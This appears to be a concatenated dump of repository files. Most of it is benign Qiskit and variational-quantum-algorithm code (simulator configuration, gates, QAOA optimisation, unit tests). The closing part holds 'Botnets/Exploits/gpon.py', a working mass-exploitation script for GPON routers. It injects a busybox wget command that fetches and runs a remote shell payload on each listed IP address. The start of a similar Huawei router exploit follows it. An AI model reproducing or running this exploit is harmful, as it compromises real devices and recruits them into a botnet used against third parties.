'description': 'Two-qubit Controlled-u1 gate',
'qasm_def': 'TODO'
}, {
'name': 'cu2',
'parameters': ['phi', 'lam'],
'conditional': True,
'description': 'Two-qubit Controlled-u2 gate',
'qasm_def': 'TODO'
}, {
'name': 'cu3',
'parameters': ['theta', 'phi', 'lam'],
'conditional': True,
'description': 'Two-qubit Controlled-u3 gate',
'qasm_def': 'TODO'
}, {
'name': 'mcx',
'parameters': [],
'conditional': True,
'description': 'N-qubit multi-controlled-X gate',
'qasm_def': 'TODO'
}, {
'name': 'mcy',
'parameters': [],
'conditional': True,
'description': 'N-qubit multi-controlled-Y gate',
'qasm_def': 'TODO'
}, {
'name': 'mcz',
'parameters': [],
'conditional': True,
'description': 'N-qubit multi-controlled-Z gate',
'qasm_def': 'TODO'
}, {
'name': 'mcu1',
'parameters': ['lam'],
'conditional': True,
'description': 'N-qubit multi-controlled-u1 gate',
'qasm_def': 'TODO'
}, {
'name': 'mcu2',
'parameters': ['phi', 'lam'],
'conditional': True,
'description': 'N-qubit multi-controlled-u2 gate',
'qasm_def': 'TODO'
}, {
'name': 'mcu3',
'parameters': ['theta', 'phi', 'lam'],
'conditional': True,
'description': 'N-qubit multi-controlled-u3 gate',
'qasm_def': 'TODO'
}, {
'name': 'mcswap',
'parameters': [],
'conditional': True,
'description': 'N-qubit multi-controlled-SWAP gate',
'qasm_def': 'TODO'
}, {
'name': 'multiplexer',
'parameters': ['mat1', 'mat2', '...'],
'conditional': True,
'description': 'N-qubit multi-plexer gate. '
'The input parameters are the gates for each value.',
'qasm_def': 'TODO'
}]
}
def __init__(self, configuration=None, provider=None):
super().__init__(unitary_controller_execute,
QasmBackendConfiguration.from_dict(self.DEFAULT_CONFIGURATION),
provider=provider)
def _validate(self, qobj, backend_options, noise_model):
"""Semantic validations of the qobj which cannot be done via schemas.
Some of these may later move to backend schemas.
1. Set shots=1
2. No measurements or reset
3. Check number of qubits will fit in local memory.
"""
name = self.name()
if noise_model is not None:
raise AerError("{} does not support noise.".format(name))
n_qubits = qobj.config.n_qubits
max_qubits = self.configuration().n_qubits
if n_qubits > max_qubits:
raise AerError(
'Number of qubits ({}) is greater than max ({}) for "{}" with {} GB system memory.'
.format(n_qubits, max_qubits, name, int(local_hardware_info()['memory'])))
if qobj.config.shots != 1:
logger.info('"%s" only supports 1 shot. Setting shots=1.',
name)
qobj.config.shots = 1
for experiment in qobj.experiments:
exp_name = experiment.header.name
if getattr(experiment.config, 'shots', 1) != 1:
logger.info('"%s" only supports 1 shot. '
'Setting shots=1 for circuit "%s".',
name, exp_name)
experiment.config.shots = 1
for operation in experiment.instructions:
if operation.name in ['measure', 'reset']:
raise AerError(
'Unsupported {} instruction {} in circuit {}'
.format(name, operation.name, exp_name))
``` |
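Based on the class docstring above, here is a hedged usage sketch showing how backend options can be passed through `qiskit.execute`; the specific option values are illustrative only.

```python
# Usage sketch (assumes the qiskit-aer era this file targets, where
# UnitarySimulator is importable from qiskit.providers.aer).
from qiskit import QuantumCircuit, execute
from qiskit.providers.aer import UnitarySimulator

circ = QuantumCircuit(2)
circ.h(0)
circ.cx(0, 1)  # note: no measure/reset, which this backend rejects

backend = UnitarySimulator()
result = execute(circ, backend,
                 backend_options={"zero_threshold": 1e-7,
                                  "max_parallel_threads": 1}).result()
unitary = result.get_unitary(circ)  # 4x4 unitary for the 2-qubit circuit
```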
{
"source": "1ucian0/qiskit-ibmq-provider",
"score": 3
} |
#### File: ibmq/circuits/exceptions.py
```python
from ..exceptions import IBMQError
CIRCUIT_NOT_ALLOWED = 'Circuit support is not available yet in this account'
CIRCUIT_SUBMIT_ERROR = 'Circuit could not be submitted: {}'
CIRCUIT_RESULT_ERROR = 'Circuit result could not be returned: {}'
class CircuitError(IBMQError):
"""Generic Circuit exception."""
pass
class CircuitAvailabilityError(CircuitError):
"""Error while accessing a Circuit."""
def __init__(self, message: str = ''):
super().__init__(message or CIRCUIT_NOT_ALLOWED)
class CircuitSubmitError(CircuitError):
"""Error while submitting a Circuit."""
def __init__(self, message: str):
super().__init__(CIRCUIT_SUBMIT_ERROR.format(message))
class CircuitResultError(CircuitError):
"""Error during the results of a Circuit."""
def __init__(self, message: str):
super().__init__(CIRCUIT_RESULT_ERROR.format(message))
```
#### File: ibmq/utils/utils.py
```python
import re
import keyword
def to_python_identifier(name: str) -> str:
"""Convert a name to a valid Python identifier.
Args:
name (str): Name to be converted.
Returns:
str: Name that is a valid Python identifier.
"""
# Python identifiers can only contain alphanumeric characters
# and underscores and cannot start with a digit.
pattern = re.compile(r"\W|^(?=\d)", re.ASCII)
if not name.isidentifier():
name = re.sub(pattern, '_', name)
# Convert to snake case
name = re.sub('((?<=[a-z0-9])[A-Z]|(?!^)(?<!_)[A-Z](?=[a-z]))', r'_\1', name).lower()
while keyword.iskeyword(name):
name += '_'
return name
```
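A short illustration of `to_python_identifier` (assuming the function above is in scope); the expected outputs in the comments follow from the regexes and the keyword check shown above, not from external documentation.

```python
# Illustrative calls; expected results derived from the implementation above.
print(to_python_identifier("className"))    # 'class_name'   (CamelCase -> snake_case)
print(to_python_identifier("1st backend"))  # '_1st_backend' (leading digit and space replaced)
print(to_python_identifier("pass"))         # 'pass_'        (Python keyword gets a trailing underscore)
```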
#### File: test/ibmq/test_circuits.py
```python
import os
from qiskit.providers.ibmq.ibmqfactory import IBMQFactory
from qiskit.result import Result
from ..decorators import requires_qe_access
from ..ibmqtestcase import IBMQTestCase
class TestCircuits(IBMQTestCase):
"""Tests IBM Q Circuits."""
def setUp(self):
super().setUp()
if not os.getenv('CIRCUITS_TESTS'):
            self.skipTest('Circuit tests disabled')
@requires_qe_access
def test_circuit_random_uniform(self, qe_token, qe_url):
"""Test random_uniform circuit."""
ibmq_factory = IBMQFactory()
provider = ibmq_factory.enable_account(qe_token, qe_url)
results = provider.circuits.random_uniform(number_of_qubits=4)
self.assertIsInstance(results, Result)
``` |
{
"source": "1ucian0/qiskit-terra-fuzz",
"score": 2
} |
#### File: extensions/standard/rx.py
```python
from qiskit.circuit import CompositeGate
from qiskit.circuit import Gate
from qiskit.circuit import QuantumCircuit
from qiskit.circuit import QuantumRegister
from qiskit.qasm import pi
from qiskit.extensions.standard.u3 import U3Gate
class RXGate(Gate):
"""rotation around the x-axis."""
def __init__(self, theta):
"""Create new rx single qubit gate."""
super().__init__("rx", 1, [theta])
def _define(self):
"""
gate rx(theta) a {u3(theta, -pi/2, pi/2) a;}
"""
definition = []
q = QuantumRegister(1, "q")
rule = [
(U3Gate(self.params[0], -pi/2, pi/2), [q[0]], [])
]
for inst in rule:
definition.append(inst)
self.definition = definition
def inverse(self):
"""Invert this gate.
rx(theta)^dagger = rx(-theta)
"""
return RXGate(-self.params[0])
def rx(self, theta, q):
"""Apply Rx to q."""
return self.append(RXGate(theta), [q], [])
QuantumCircuit.rx = rx
CompositeGate.rx = rx
``` |
{
"source": "1ucian0/variationaltoolkit",
"score": 2
} |
#### File: variationaltoolkit/examples/libe_opt.py
```python
from __future__ import division
from __future__ import absolute_import
from mpi4py import MPI # for libE communicator
import sys, os # for adding to path
import numpy as np
import socket
from libensemble.libE import libE
from libensemble.gen_funcs.persistent_aposmm import aposmm as gen_f
from libensemble.alloc_funcs.persistent_aposmm_alloc import persistent_aposmm_alloc as alloc_f
import numpy as np
import networkx as nx
import pickle
import argparse
from functools import partial
from variationaltoolkit import ObjectiveWrapper
from qiskit.optimization.ising.max_cut import get_operator as get_maxcut_operator
from libensemble.tools import parse_args, add_unique_random_streams
# from libensemble.comms.logs import LogConfig
# import uuid
# logs = LogConfig.config
# libE_run_id = uuid.uuid4()
# logs.stat_filename = "libE_stats_" + str(libE_run_id) + ".log"
# logs.filename = "ensemble_" + str(libE_run_id) + ".log"
nworkers, is_master, libE_specs, _ = parse_args()
libE_specs['save_H_and_persis_on_abort'] = False
libE_specs['disable_log_files'] = True
def optimize_obj(obj_val, num_parameters, ub=None, lb=None, sim_max=None):
def sim_func(H, gen_info, sim_specs, libE_info):
del libE_info # Ignored parameter
batch = len(H['x'])
O = np.zeros(batch, dtype=sim_specs['out'])
for i, x in enumerate(H['x']):
O['f'][i] = obj_val(x)
return O, gen_info
script_name = os.path.splitext(os.path.basename(__file__))[0]
#State the objective function, its arguments, output, and necessary parameters (and their sizes)
sim_specs = {
'sim_f':
sim_func, # This is the function whose output is being minimized
'in': ['x'], # These keys will be given to the above function
'out': [
('f',
float), # This is the output from the function being minimized
],
}
gen_out = [
('x', float, num_parameters),
('x_on_cube', float, num_parameters),
('sim_id', int),
('local_pt', bool),
('local_min', bool),
]
np.random.seed(0)
# State the generating function, its arguments, output, and necessary parameters.
gen_specs = {
'gen_f': gen_f,
'in': ['x', 'f', 'local_pt', 'sim_id', 'returned', 'x_on_cube', 'local_min'],
#'mu':0.1, # limit on dist_to_bound: everything closer to bound than mu is thrown out
'out': gen_out,
'user':{
'lb': lb,
'ub': ub,
'initial_sample_size': 20, # num points sampled before starting opt runs, one per worker
# 'localopt_method': 'scipy_COBYLA',
# 'scipy_kwargs': {'tol': 1e-10, 'options': {'disp':True, 'maxiter': 100}},
'localopt_method': 'LN_COBYLA',
'sample_points': np.atleast_2d(np.random.uniform(lb, ub, (20,len(lb)))),
'run_max_eval':100,
'ftol_rel':1e-10,
'xtol_rel':1e-10,
'num_pts_first_pass': nworkers-1,
'max_active_runs': 2,
'periodic': True,
}
}
# Tell libEnsemble when to stop
exit_criteria = {'sim_max': sim_max}
persis_info = add_unique_random_streams({}, nworkers + 1)
alloc_specs = {'alloc_f': alloc_f, 'out': [('given_back', bool)], 'user': {}}
H, persis_info, flag = libE(
sim_specs,
gen_specs,
exit_criteria,
persis_info=persis_info,
libE_specs=libE_specs,
alloc_specs=alloc_specs)
if MPI.COMM_WORLD.Get_rank() == 0:
return (H, persis_info)
def maxcut_obj(x,G):
cut = 0
for i, j in G.edges():
if x[i] != x[j]:
# the edge is cut
cut -= 1
return cut
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
"--maxiter", type = int,
default = "300",
help = "number of iterations, default is 100")
parser.add_argument(
"--nnodes", type = int,
default = "6",
help = "number of nodes in the 3-regular graph")
parser.add_argument(
"-p", type = int,
default = "10",
help = "maximum depth to explore")
parser.add_argument(
"--graph-generator-seed", type = int,
default = "1",
help = "seed for random graph generation")
args = parser.parse_args()
# generate objw
# pass to libE
#G = nx.random_regular_graph(3, args.nnodes, seed=args.graph_generator_seed)
    # For testing purposes, hardcode the Petersen graph
elist = [
[0,1],[1,2],[2,3],[3,4],[4,0],
[0,5],[1,6],[2,7],[3,8],[4,9],
[5,7],[5,8],[6,8],[6,9],[7,9]
]
G=nx.OrderedGraph()
G.add_edges_from(elist)
w = nx.adjacency_matrix(G)
obj_f_cut = partial(maxcut_obj, G=G)
C, _ = get_maxcut_operator(w)
lb = np.array([0, 0] * args.p)
ub = np.array([np.pi / 2] * args.p + [np.pi] * args.p)
obj_w = ObjectiveWrapper(
obj_f_cut,
varform_description={'name':'QAOA', 'p':args.p, 'cost_operator':C, 'num_qubits':G.number_of_nodes()},
backend_description={'package':'qiskit', 'provider':'Aer', 'name':'statevector_simulator'},
execute_parameters={})
assert(obj_w.num_parameters == 2*args.p)
t = optimize_obj(obj_w.get_obj(), obj_w.num_parameters, ub=ub, lb=lb, sim_max=args.maxiter)
# if is_master:
# #outpath = f"/zfs/safrolab/users/rshaydu/quantum/data/nasa_2020/libe_optimized_schedules/n_{args.nnodes}_p_{args.p}_gseed_{args.graph_generator_seed}.p"
# outpath = f"/zfs/safrolab/users/rshaydu/quantum/data/nasa_2020/libe_optimized_schedules/petersen_p_{args.p}.p"
# print(f"Found solution {min(t[0]['f'])}, saving to {outpath}")
# pickle.dump(t, open(outpath, "wb"))
```
#### File: variationaltoolkit/test/test_objectives.py
```python
import unittest
import numpy as np
import networkx as nx
from variationaltoolkit.objectives import modularity_obj
class TestObjectives(unittest.TestCase):
def test_modularity_obj(self):
w = np.array([[0,1,1,0,0,0],[1,0,1,0,0,0],[1,1,0,1,0,0],[0,0,1,0,1,1],[0,0,0,1,0,1],[0,0,0,1,1,0]])
G = nx.from_numpy_matrix(w)
B = nx.modularity_matrix(G, nodelist = list(range(6)))
m = G.number_of_edges()
x = np.array([0,0,0,1,1,1])
N = 1
y = np.array([0,0,0,1,1,0,1,1,1,1,1,1])
M = 2
self.assertTrue(abs(modularity_obj(x, N, B, m) + 10/28) < 1e-5)
self.assertTrue(abs(modularity_obj(y, M, B, m) + 9/98) < 1e-5)
if __name__ == '__main__':
unittest.main()
```
#### File: variationaltoolkit/test/test_utils.py
```python
import unittest
import numpy as np
import networkx as nx
import time
from functools import partial
from qiskit import QuantumCircuit, Aer, execute
from qiskit.optimization.ising.max_cut import get_operator as get_maxcut_operator
from variationaltoolkit.utils import obj_from_statevector, precompute_obj, cost_operator_to_vec, solution_density, get_max_independent_set_operator, check_cost_operator
from variationaltoolkit.objectives import maxcut_obj
from variationaltoolkit.endianness import state_num2str
def local_pickleable_maxcut_obj(x, G=None):
cut = 0
for i, j in G.edges():
if x[i] != x[j]:
# the edge is cut
cut -= 1
return cut
class TestUtils(unittest.TestCase):
def setUp(self):
elist = [[0,1], [0,2], [0,3], [1,4], [1,5], [2,4], [2,5], [3,4], [3,5]]
self.G=nx.OrderedGraph()
self.G.add_edges_from(elist)
self.obj = partial(local_pickleable_maxcut_obj, G=self.G)
def test_obj_from_statevector(self):
sv = np.zeros(2**6)
sv[11] = 1
self.assertTrue(np.isclose(obj_from_statevector(sv, self.obj), -5))
def test_obj_from_statevector_complex(self):
sv = np.zeros(2**6, dtype=complex)
sv[11] = 1j
self.assertTrue(np.isclose(obj_from_statevector(sv, self.obj), -5))
def test_precompute_obj(self):
G = nx.OrderedGraph()
elist = [[0,1],[1,2],[1,3],[2,3]]
G.add_edges_from(elist)
N = G.number_of_nodes()
w = nx.adjacency_matrix(G, nodelist=range(N))
obj = partial(maxcut_obj, w=w)
qc = QuantumCircuit(N,N)
qc.x([0])
backend = Aer.get_backend('statevector_simulator')
sv = execute(qc, backend=backend).result().get_statevector()
precomputed = precompute_obj(obj, N)
self.assertEqual(len(precomputed[np.where(sv)]), 1)
self.assertEqual(obj_from_statevector(sv, obj), precomputed[np.where(sv)][0])
def test_precompute_obj_cost_ham(self):
w = nx.adjacency_matrix(self.G, nodelist=range(self.G.number_of_nodes()))
C, offset = get_maxcut_operator(w)
cost_diag = cost_operator_to_vec(C, offset)
precomputed = precompute_obj(self.obj, self.G.number_of_nodes())
self.assertTrue(np.allclose(cost_diag, precomputed))
def test_solution_density(self):
G = nx.generators.classic.complete_graph(8)
obj_f = partial(local_pickleable_maxcut_obj, G=G)
density = solution_density(obj_f, G.number_of_nodes())
self.assertEqual(density, 0.2734375)
def test_get_max_independent_set_operator(self):
n = 4
def obj(x):
return -sum(x)
C, offset = get_max_independent_set_operator(n)
check_cost_operator(C, obj, offset=offset)
if __name__ == '__main__':
unittest.main()
```
#### File: variationaltoolkit/test/test_varform.py
```python
import unittest
import numpy as np
import networkx as nx
import importlib.util
import sys
from itertools import product
from variationaltoolkit import VarForm
from variationaltoolkit.utils import mact, get_max_independent_set_operator
from qiskit.aqua.components.variational_forms import RYRZ
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit.circuit import Parameter
from qiskit.optimization.ising.max_cut import get_operator as get_maxcut_operator
# a recipe for conditional import from https://docs.python.org/3/library/importlib.html#checking-if-a-module-can-be-imported
_mpsspec = importlib.util.find_spec('mpsbackend')
skip_mpsbackend = ('mpsbackend' not in sys.modules) and (_mpsspec is None)
class TestVarForm(unittest.TestCase):
def setUp(self):
self.varform_description = {'name':'RYRZ', 'num_qubits':5, 'depth':1}
def test_import_ryrz(self):
var_form = VarForm(varform_description=self.varform_description)
self.assertIsInstance(var_form.var_form, RYRZ)
def test_ryrz_qasm_simulator(self):
var_form = VarForm(varform_description=self.varform_description)
parameters = np.random.uniform(0, np.pi, var_form.num_parameters)
execute_parameters={'shots':100}
resstrs = var_form.run(parameters,
backend_description={'package':'qiskit', 'provider':'Aer', 'name':'qasm_simulator'},
execute_parameters=execute_parameters)
self.assertEqual(len(resstrs), execute_parameters['shots'])
self.assertTrue(all(len(x) == self.varform_description['num_qubits'] for x in resstrs))
def test_qaoa_maxcut(self):
w = np.array([[0,1,1,0],[1,0,1,1],[1,1,0,1],[0,1,1,0]])
C, offset = get_maxcut_operator(w)
var_form = VarForm(varform_description={'name':'QAOA', 'p':2, 'cost_operator':C, 'num_qubits':4})
parameters = np.random.uniform(0, np.pi, var_form.num_parameters)
execute_parameters={'shots':100}
resstrs = var_form.run(parameters,
backend_description={'package':'qiskit', 'provider':'Aer', 'name':'qasm_simulator'},
execute_parameters=execute_parameters)
self.assertEqual(len(resstrs), execute_parameters['shots'])
self.assertTrue(all(len(x) == 4 for x in resstrs))
def test_qaoa_mixer(self):
w = np.array([[0,1,1,0],[1,0,1,1],[1,1,0,1],[0,1,1,0]])
C, offset = get_maxcut_operator(w)
# build initial state circuit
initial_state_circuit = QuantumCircuit(4)
initial_state_circuit.u2(0, np.pi, range(4))
var_form_operator_mix = VarForm(varform_description={'name':'QAOA', 'p':2, 'cost_operator':C, 'num_qubits':4})
var_form_circuit_mix = VarForm(varform_description={'name':'QAOA', 'p':2, 'cost_operator':C, 'num_qubits':4, 'use_mixer_circuit':True, 'initial_state_circuit':initial_state_circuit})
self.assertEqual(var_form_operator_mix.num_parameters, var_form_circuit_mix.num_parameters)
parameters = np.random.uniform(0, np.pi, var_form_operator_mix.num_parameters)
sv_operator_mix = var_form_operator_mix.run(parameters,
backend_description={'package':'qiskit', 'provider':'Aer', 'name':'statevector_simulator'},
execute_parameters={})
sv_circuit_mix = var_form_circuit_mix.run(parameters,
backend_description={'package':'qiskit', 'provider':'Aer', 'name':'statevector_simulator'},
execute_parameters={})
# check that the two statevectors are equal up to global phase
phase_diff = sv_circuit_mix / sv_operator_mix
self.assertTrue(np.allclose(phase_diff, np.full(phase_diff.shape, phase_diff[0])))
def test_qaoa_pass_mixer(self):
w = np.array([[0,1,1,0],[1,0,1,1],[1,1,0,1],[0,1,1,0]])
C, offset = get_maxcut_operator(w)
var_form_operator_mix = VarForm(varform_description={'name':'QAOA', 'p':2, 'cost_operator':C, 'num_qubits':4})
# build initial state circuit
initial_state_circuit = QuantumCircuit(4)
initial_state_circuit.u2(0, np.pi, range(4))
# build transverse field mixer circuit
mixer_circuit = QuantumCircuit(4)
beta = Parameter('beta')
for q1 in range(4):
mixer_circuit.h(q1)
mixer_circuit.rz(2*beta, q1)
mixer_circuit.h(q1)
# pass it to variational form
var_form_circuit_mix = VarForm(varform_description={'name':'QAOA', 'p':2, 'cost_operator':C, 'num_qubits':4, 'use_mixer_circuit':True, 'mixer_circuit':mixer_circuit, 'initial_state_circuit':initial_state_circuit})
self.assertEqual(var_form_operator_mix.num_parameters, var_form_circuit_mix.num_parameters)
parameters = np.random.uniform(0, np.pi, var_form_operator_mix.num_parameters)
sv_operator_mix = var_form_operator_mix.run(parameters,
backend_description={'package':'qiskit', 'provider':'Aer', 'name':'statevector_simulator'},
execute_parameters={})
sv_circuit_mix = var_form_circuit_mix.run(parameters,
backend_description={'package':'qiskit', 'provider':'Aer', 'name':'statevector_simulator'},
execute_parameters={})
# check that the two statevectors are equal up to global phase
phase_diff = sv_circuit_mix / sv_operator_mix
self.assertTrue(np.allclose(phase_diff, np.full(phase_diff.shape, phase_diff[0])))
def test_qaoa_max_independent_set(self):
elist = [[0,2],[0,4],[1,2],[1,4],[0,3],[1,3]]
G = nx.OrderedGraph()
G.add_edges_from(elist)
vertex_num = G.number_of_nodes()
w = nx.adjacency_matrix(G, nodelist=range(vertex_num))
C, offset = get_max_independent_set_operator(vertex_num)
# First, allocate registers
qu = QuantumRegister(vertex_num)
ancilla_for_multi_toffoli = QuantumRegister(vertex_num - 2)
ancilla_for_rx = QuantumRegister(1)
cu = ClassicalRegister(vertex_num)
# Mixer circuit
beta = Parameter('beta')
mixer_circuit = QuantumCircuit(qu, ancilla_for_multi_toffoli, ancilla_for_rx, cu)
for u in G.nodes():
mixer_circuit.barrier()
mact(mixer_circuit, list(qu[x] for x in G.neighbors(u)), ancilla_for_rx, ancilla_for_multi_toffoli)
mixer_circuit.mcrx(2 * beta, ancilla_for_rx, qu[u])
mixer_circuit.barrier()
mact(mixer_circuit, list(qu[x] for x in G.neighbors(u)), ancilla_for_rx, ancilla_for_multi_toffoli)
# Measurement circuit
measurement_circuit = QuantumCircuit(qu, ancilla_for_multi_toffoli, ancilla_for_rx, cu)
measurement_circuit.measure(qu, cu)
# pass it all to variational form
var_form_circuit_mix = VarForm(varform_description={
'name':'QAOA',
'p':2,
'cost_operator':C,
'num_qubits':vertex_num, 'use_mixer_circuit':True,
'mixer_circuit':mixer_circuit,
'measurement_circuit': measurement_circuit,
'qregs':[qu, ancilla_for_multi_toffoli, ancilla_for_rx, cu]})
parameters = np.random.uniform(0, np.pi, var_form_circuit_mix.num_parameters)
res = var_form_circuit_mix.run(parameters,
backend_description={'package':'qiskit', 'provider':'Aer', 'name':'qasm_simulator'},
execute_parameters={'shots': 1000})
# check that all sampled strings are valid solutions
for x in res:
for i, j in product(set(np.where(reversed(x))[0]), repeat=2):
if i != j:
try:
self.assertTrue(not G.has_edge(i,j))
except AssertionError as e:
print(i,j,x)
raise e
@unittest.skipIf(skip_mpsbackend, "mpsbackend not found")
def test_ryrz_mpssimulator(self):
var_form = VarForm(varform_description=self.varform_description)
parameters = np.random.uniform(0, np.pi, var_form.num_parameters)
execute_parameters={'shots':100}
resstrs = var_form.run(parameters,
backend_description={'package':'mpsbackend'},
execute_parameters=execute_parameters)
self.assertEqual(len(resstrs), execute_parameters['shots'])
self.assertTrue(all(len(x) == self.varform_description['num_qubits'] for x in resstrs))
# TODO:
# check that runs on qiskit.Aer mps simulator and returns correct number of resstrs
# check that submits a job to IBMQ correctly
if __name__ == '__main__':
unittest.main()
```
#### File: variationaltoolkit/variationaltoolkit/endianness.py
```python
import numpy as np
def state_num2str(basis_state_as_num, nqubits):
return '{0:b}'.format(basis_state_as_num).zfill(nqubits)
def state_str2num(basis_state_as_str):
return int(basis_state_as_str, 2)
def state_reverse(basis_state_as_num, nqubits):
basis_state_as_str = state_num2str(basis_state_as_num, nqubits)
new_str = basis_state_as_str[::-1]
return state_str2num(new_str)
def get_adjusted_state(state):
nqubits = np.log2(state.shape[0])
if nqubits % 1:
raise ValueError("Input vector is not a valid statevector for qubits.")
nqubits = int(nqubits)
adjusted_state = np.zeros(2**nqubits, dtype=complex)
for basis_state in range(2**nqubits):
adjusted_state[state_reverse(basis_state, nqubits)] = state[basis_state]
return adjusted_state
```
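A minimal usage sketch of `get_adjusted_state`, which reverses the little-endian qubit ordering of a statevector index by index; the import path mirrors the file location above and the numbers are illustrative only:
```python
import numpy as np

from variationaltoolkit.endianness import get_adjusted_state

# Statevector of |01> with qubit 0 as the least significant bit:
# the single non-zero amplitude sits at index 0b01 = 1.
state = np.array([0, 1, 0, 0], dtype=complex)

# Every basis-state index has its bit string reversed, so 0b01 -> 0b10.
adjusted = get_adjusted_state(state)
print(adjusted)  # [0.+0.j 0.+0.j 1.+0.j 0.+0.j]
```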
#### File: variationaltoolkit/variationaltoolkit/varform.py
```python
import importlib.util
import sys
import numpy as np
# a recipe for conditional import from https://docs.python.org/3/library/importlib.html#checking-if-a-module-can-be-imported
_spec = importlib.util.find_spec('mpsbackend')
if 'mpsbackend' in sys.modules:
#raise RuntimeError("mpsbackend already in sys.modules. This means that someone imported mpsbackend before, breaking the encapsulation. This should not happen.")
pass
elif _spec is not None:
# If you chose to perform the actual import ...
_module = importlib.util.module_from_spec(_spec)
sys.modules['mpsbackend'] = _module
_spec.loader.exec_module(_module)
from mpsbackend import MPSSimulator
print("Using mpsbackend")
else:
print(f"Can't find the mpsbackend module, continuing without it")
import qiskit
import qiskit.aqua.components.variational_forms as qiskit_variational_forms
from qiskit.aqua.algorithms.adaptive.qaoa.var_form import QAOAVarForm
from variationaltoolkit.variational_forms import QAOACircuitMixer
from .utils import execute_wrapper, check_and_load_accounts, contains_and_raised
class VarForm:
"""Variational Form wrapper"""
def __init__(self, varform_description=None, problem_description=None):
"""Constructor.
Args:
varform_description (dict) : Specifies the variational form.
Must specify name
For hardware-efficient variational forms,
must match the __init__ of desired variational form.
For QAOA, must specify p, cost_operator
optional: mixer_operator
problem_description (dict) : Specifies the problem (maxcut, modularity, ising).
Optional for hardware-efficient variational forms.
Must have field 'name'.
"""
if varform_description is None:
raise ValueError(f"varform_description is required")
self.num_qubits = varform_description['num_qubits']
if varform_description['name'] == 'QAOA':
if contains_and_raised(varform_description, 'use_mixer_circuit'):
varform_parameters = {k : v for k,v in varform_description.items() if k != 'name' and k != 'num_qubits' and k != 'use_mixer_circuit'}
self.var_form = QAOACircuitMixer(**varform_parameters)
else:
varform_parameters = {k : v for k,v in varform_description.items() if k != 'name' and k != 'num_qubits'}
self.var_form = QAOAVarForm(**varform_parameters)
else:
varform_parameters = {k : v for k,v in varform_description.items() if k != 'name'}
self.var_form = getattr(qiskit_variational_forms, varform_description['name'])(**varform_parameters)
self.num_parameters = self.var_form._num_parameters
self.varform_description = varform_description
self.problem_description = problem_description
def run(self, parameters, backend_description=None, execute_parameters=None):
"""Runs the variational form
Args:
parameters (np.array) : variational parameters to pass to the form
backend_description (dict) : Specifies backend parameters.
TBA
For qiskit, must specify TBA
execute_parameters (dict) : Parameters passed to execute function
"""
if backend_description is None:
raise ValueError(f"backend_description is required")
if backend_description['package'] == 'qiskit':
if backend_description['provider'] == 'Aer':
provider = qiskit.Aer
else:
check_and_load_accounts()
provider = qiskit.IBMQ.get_provider(backend_description['provider'])
backend = provider.get_backend(backend_description['name'])
elif backend_description['package'] == 'mpsbackend':
backend = MPSSimulator()
circuit = self.var_form.construct_circuit(parameters)
if ((backend_description['package'] == 'qiskit' and 'statevector' not in backend_description['name'])
or (hasattr(self.var_form, '_measurement_circuit') and self.var_form._measurement_circuit is not None)):
if not circuit.cregs:
c = qiskit.ClassicalRegister(self.num_qubits, name='c')
circuit.add_register(c)
circuit.measure(circuit.qregs[0], circuit.cregs[0])
job = execute_wrapper(circuit, backend, **execute_parameters)
result = job.result()
if backend_description['package'] == 'qiskit' and 'statevector' in backend_description['name']:
return result.get_statevector()
else:
if hasattr(result, 'get_resstrs'):
return result.get_resstrs()
else:
resstrs = []
for k, v in result.get_counts().items():
for _ in range(v):
resstrs.append(np.array([int(x) for x in k]))
return resstrs
``` |
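For orientation, a minimal sketch of driving the `VarForm` wrapper directly, mirroring the hardware-efficient/statevector usage exercised in the tests above; the import path and the availability of qiskit-aqua's `RYRZ` variational form are assumptions:
```python
import numpy as np

from variationaltoolkit.varform import VarForm

# Hardware-efficient RYRZ form on 4 qubits.
var_form = VarForm(varform_description={'name': 'RYRZ', 'num_qubits': 4, 'depth': 3})

# Random variational parameters of the right length.
parameters = np.random.uniform(0, np.pi, var_form.num_parameters)

# Run on the Aer statevector simulator; returns the final statevector.
sv = var_form.run(parameters,
                  backend_description={'package': 'qiskit', 'provider': 'Aer',
                                       'name': 'statevector_simulator'},
                  execute_parameters={})
```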
{
"source": "1ucif3r/DDOS-th31ucif3r",
"score": 2
} |
#### File: Botnets/Exploits/gpon.py
```python
import sys, socket, time, os, ssl
from Queue import *
#from multiprocessing.dummy import Pool as ThreadPool
#from multiprocessing import Process
from threading import Thread
from sys import stdout
if len(sys.argv) < 2:
print "Usage: python "+sys.argv[0]+" <list>"
sys.exit()
port = 443
buf = 4096
count = 0
queue = Queue()
post_data = "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=$(busybox+wget+http://172.16.58.3/Black1.sh+-O+->+/dev/r;sh+/dev/r)&ipv=0\r\n"
headers = "POST /GponForm/diag_Form?style/ HTTP/1.1\r\nHost: 192.168.0.1:443\r\nUser-Agent: curl/7.3.2\r\nAccept: */*\r\nxAccept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\nContent-Type: text/plain\r\nContent-Length: "+str(len(post_data))+"\r\n\r\n"+str(post_data)
#headers = "POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 192.168.0.1:443\r\nUser-Agent: curl/7.3.2\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\nContent-Type: text/plain\r\nContent-Length: "+str(len(post_data))+"\r\n\r\n"+str(post_data)
i = 0
ips = open(sys.argv[1], "r").readlines()
def gpwn(host):
global i
host = host.strip("\n")
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s = ssl.wrap_socket(sock)
s.settimeout(3)
s.connect((host, port))
s.send(headers)
time.sleep(5)
print "\x1b[1;35m[\x1b[1;36mGPON\x1b[1;35m] \x1b[1;37m- \x1b[1;35m[\x1b[1;32m%s\x1b[1;35m] \x1b[1;37m- \x1b[1;35m[\x1b[1;32mDEPLOYING\x1b[1;35m]" % (host)
resp = s.recv(buf).strip()
if "200 OK" in resp:
i += 1
s.close()
except:
pass
return
def load_to_queue():
global count
for line in ips:
count += 1
line = line.strip("\r\n")
sys.stdout.write("\r[%d] Added to queue" % (count))
sys.stdout.flush()
queue.put(line)
sys.stdout.write("\n")
def main():
load_to_queue()
i = 0
while i < count:
i += 1
try:
ip = queue.get()
f = Thread(target=gpwn, args=(ip,))
f.start()
queue.task_done()
except KeyboardInterrupt:
os.kill(os.getpid(),9)
except Exception as i:
print i
pass
if __name__ == "__main__":
main()
```
#### File: Botnets/Exploits/huawei.py
```python
import threading, sys, time, random, socket, re, os, struct, array, requests
from threading import Thread
from time import sleep
import requests
from requests.auth import HTTPDigestAuth
from decimal import *
ips = open(sys.argv[1], "r").readlines()
